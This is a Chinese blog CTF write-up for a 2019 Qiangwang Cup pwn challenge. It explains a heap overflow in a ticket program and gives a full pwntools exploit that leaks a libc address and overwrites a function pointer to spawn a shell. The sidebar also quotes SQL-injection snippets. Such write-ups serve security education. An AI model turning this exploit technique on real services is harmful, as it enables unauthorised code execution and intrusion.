2019强网杯wp

最新推荐文章于 2022-07-21 12:43:02 发布
最新推荐文章于 2022-07-21 12:43:02 发布
阅读量1.7k 收藏 1
点赞数 1
分类专栏: CTF-Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40934487/article/details/90610001
版权

我不配强网!!

强网先锋-AP

64位elf文件,保护全开

拖入IDA中查看流程,有三个选项,添加一张票,查看一张票,修改指定票
添加票的函数申请了两个堆块,第一个堆块(v0)存name的堆块地址和puts的地址,第二个堆块存name

查看票的操作,用v0堆块存着的puts地址作为函数调用,v0中存着name的堆块地址作为参数,相当于“puts(&name)”

修改指定票,虽然限制了票的index,但是没有限制输入name的大小,从而导致可以在堆块里溢出

先进行两次添加票,动态调试出堆块的分布,发现4次malloc的地址是连续的

那么我们可以修改第一个票的name,长度可以覆盖到第二个票

攻击流程
  • 通过堆溢出来泄露出puts的真实地址(partial overwrite,地址范围0x00~0xff,8++)
  • 计算出system、binsh的地址
  • 把第二个name覆盖成binsh的地址,第二个puts函数的地址覆盖成system的地址
  • open第二个票,即可获取到shell
exp:
from pwn import *
#nc 117.78.37.77 31559
context.log_level = 'debug'
r = remote("117.78.37.77",31559)
#r = process("./task_main")
file = ELF("./task_main")
puts_got = file.plt['puts']
log.info("puts_got: "+hex(puts_got))
def add(length,name):
	r.recvuntil("The length of my owner's name:\n")
	r.sendline(length)
	r.recvuntil("Give me my owner's name:\n")
	r.sendline(name)
# def change()
r.recvuntil("Choice >> \n")
r.sendline("1")
add("10","radish")
r.recvuntil("Choice >> \n")
r.sendline("1")
add("10","aaaaaa")
r.recvuntil("Choice >> \n")
r.sendline("3")

r.recvuntil("Please tell me which tickets would you want to change it's owner's name?\n")
r.sendline("0")
r.recvuntil("The length of my owner's name:\n")
r.sendline("34")
r.recvuntil("Give me my owner's name:\n")
payload = "a"*32+chr(0x18)
r.send(payload)
r.recvuntil("Choice >> \n")
r.sendline("2")
r.recvuntil("Please tell me which tickets would you want to open?\n")
r.sendline("1")
r.recvuntil("I'm a magic tickets.I will tell you who is my owner!\n")
puts_addr = u64(r.recvuntil("\x0a",drop=True)+"\x00\x00")
log.info("puts_addr: "+hex(puts_addr))
r.recvuntil("Choice >> \n")
puts_sym = 0x06f690
base_addr = puts_addr-puts_sym
log.info("base_addr: "+hex(base_addr))
system_addr = 0x045390+base_addr
binsh_str = 0x18cd57+base_addr
log.info("system_addr: "+hex(system_addr))
log.info("binsh_str: "+hex(binsh_str))

r.sendline("3")
r.recvuntil("Please tell me which tickets would you want to change it's owner's name?\n")
r.sendline("0")
r.recvuntil("The length of my owner's name:\n")
r.sendline("49")
r.recvuntil("Give me my owner's name:\n")
payload = "a"*32+p64(binsh_str)+p64(system_addr)
r.send(payload)
r.sendline("2")
r.recvuntil("Please tell me which tickets would you want to open?\n")
r.sendline("1")
r.recvuntil("I'm a magic tickets.I will tell you who is my owner!\n")
sleep(0.1)
r.interactive()

强网先锋_AD

没什么说的,讲预设的字符串base64解密即可得到flag

R4dish
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
护网REFINAL超详细WP
BadRer的博客
10-15 3808
前言 由于时间原因没有在比赛结束前提交flag,所以干脆写一个详细的解答过程(自认为),适合小白阅读,Pizza大佬请绕过。
第四届强网杯部分wp
weixin_44110537的博客
08-24 292
babycrt 通过分析sign函数中的代码,可以得到以下的等式:(记sign输出的值为ans) ans=S(c1*c2)%pq m+1-c1=Se1%t1…1 m+1-c2=Se2%t2…2 e1d=1%t1-1…5 e2d=1%t2-1…6 ed=1%(p-1)(q-1) Sq=md%qt2 Sp=(m+k)d%pt1 n=pq 通过观察S的生成方法可以知道S是余数为(Sq,Sp) 模数为 (qt2,pt1)的一个共同解(CRT),于是有: md=S%qt2 (m+k)d=S%pt1 即: md=S%q
web buu [强网杯 2019]高明的黑客1
weixin_44214568的博客
03-30 347
考点:脚本编写 1.根据提示,查看源码 url+www.tar.gz,下载压缩包,发现是3002个php文件 随便打开一个发现里面有传参$_GET()函数,里面有的直接接了eval,相当于直接执行了参数里面的值,但是经过审计代码发现,里面的很多参数都已经在代码里被赋值,所以我们需要从三千多个文件里找到有用的$_GET(),很显然通过人工寻找有一定难度,那么就需要我们编写脚本 ...
2019强网杯web upload分析
a3uRa的一个窝
06-01 1207
<?php namespace app\web\controller; use think\Controller; class Register extends Controller { public $checker; public $registed; public function __construct() { $this->...
护网2019 mergeheap --pwn
weixin_30552811的博客
09-08 247
护网 又是签到 一天 这道题一开始 不懂得如何泄露 libc 信息,就蒙了 后来群里师傅也是刚刚好 做出 到这里 我就接着做了 。 先看下保护,发现 全开了 然后 就看下流程 大概 就是添加 chunk show 合并两个chunk 可利用的 洞就是 int merge() { int v1; // ST1C_4...
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
红帽wp红帽wp
05-06
红帽wp红帽wp红帽wp红帽wp红帽wp红帽wp红帽wp红帽wp红帽wp
掘安wp分析文件
04-10
根据官方wp复现 和自己参赛记录整理记录的IDA分析文件
极客谷WP1
08-03
极客谷WP1反编译分析 标题解释 "极客谷WP1"是指在极客谷平台上的一个WP1项目,WP1是指Web Protection 1的缩写,表示该项目是一个Web保护项目。 描述解释 描述信息为空,但结合标签"软件/插件 intellij idea...
2020 第二届网鼎 boom wp
01-20
2020 第二届网鼎 boom wp ​ ​ 卑微新手在线答题。。。。。 第二届网鼎-boom 下载附件得到一个boom.exe程序 打开是这样 根据提示继续 得到一串md5 加密的数据,使用在线解密 https://www.somd5.com/ 得到第...
[强网杯 2019]随便注
沐目的博客
10-20 843
1知识点 1.1MySQL命令 原来堆叠注入竟然真的有用,真的就像这道题所说的,安全和开发缺一不可。很久没用过堆叠注入了。复习一下把。 查看所有数据库:0’;show databases;%23 查看当前数据库的表: 1’;show tables;%23 查看某个表的某个字段: 0’;show username from users;%23 把users表名改为user:rename table...
第二届强网杯wp
03-29 245
web web签到 利用了md5碰撞 payload为 param1 =%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%6...
强网杯2021 qwb misc WP 5题
mumuzi的博客
06-16 2774
BlueTeaming、ISO1995、CipherMan、ExtremelySlow、EzTime 本来是说昨天发的,忘了…… 然后取证题,比较偏向爆破出的flag;如果是想知道原理等可以去看看空白师傅的WP:https://mp.weixin.qq.com/s/ItaIgLxcXCjvAhyyP3On9Q BlueTeaming 下载解压,得到一个无后缀,winhex查看是7z文件头,添加.7z,解压 得到一个5个G的memory.dmp文件 是一个内存镜像,常见的内存镜像文件有raw、vmem、dmp
【第三届强网杯】write up
weixin_34272308的博客
05-28 312
一,鲲or鳗orGame 从浏览器里拿到game.gb 用 VisualBoyAdvance ,搜索内存变量,然后改变量就完事了,但是改变量他们说直接利用添加代码功能有bug,所以要在工具里的内存查看里面修改。 我犯了一个错误,我一直搜索best,导致一直搜出来的都是四个错误的地址,后来result和best交叉搜一下,就能确定一个正确的地址。 然后进工具里内存...
湖湘pwn400的wp
一个码农的笔记
12-09 2018
湖湘的pwn比赛很有趣,我做了pwn300的题目,感觉不错,我把wp分享出来,pwns的下载链接是: http://download.csdn.net/download/niexinming/10152069 把pwn400直接拖入ida中: main函数: Create Profile函数: Print Profile函数: Update Profile函数: Ex
2019强网杯_web_高明的黑客
fly夏天的博客
10-22 1445
之前参加了2019强网杯,当时表现很菜,很多题都不会做。 后来发现buuoj.cn上有复现,以此重新复现一下这次的题目。 话不多说,开始今天的主题。 一访问页面就是如下画面: 因此我们直接访问 url/www.tar.gz即可下载获得源码。 打开压缩包,发现有3000多个php文件。 尝试搜索flag文件,未果。 打开php文件进行代码审计 发现代码中存在一些诸如这样的get或post参数会执行...
HITCON lab4 wp
qq_43409582的博客
09-30 328
0x01 之前在ctf-wiki上做过的re2lib,这道题也差不多。仿照ctf-wiki上的做法,想到需要用到libc.so 的延迟绑定技术,用 got 表泄露,即输出某个函数对应的 got 表项的内容,好了话不多说先看题,首先看保护: 只开了NX. 用IDA查看: main(): 发现有个puts()函数,很容易想到用这个函数打印出它的真实地址,然后计算偏移量得到system函数的真实地址,...
反序列化(强网杯2019—UPLOAD)
kid的博客
05-29 5891
反序列化(强网杯2019—UPLOAD) 前言 这里主要是复现一下强网杯2019web的第一题,UPLOAD。这是一道反序列化的题,反正我觉得挺难的,当时已经锁定了反序列化的方向也没能完成… 感谢大佬提供的复现环境:https://github.com/CTFTraining/qwb_2019_upload UPLOAD 进入靶场后首先是一个登陆注册页面 这里很自然的要想到有没有注入,简单的万能...
2019强网杯upload
m0_61448651的博客
07-21 653
2019强网杯upload
强网杯 2022 谍影重重wp
最新发布
12-18
强网杯2022谍影重重WP是我国一项网络安全竞赛中的一个题目解答。这道题目主要涉及隐写和密码学方面的知识,要求选手解析一段加密信息,并还原出明文信息。 解题过程如下: 首先,选手会得到一段看似普通的文本,但...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值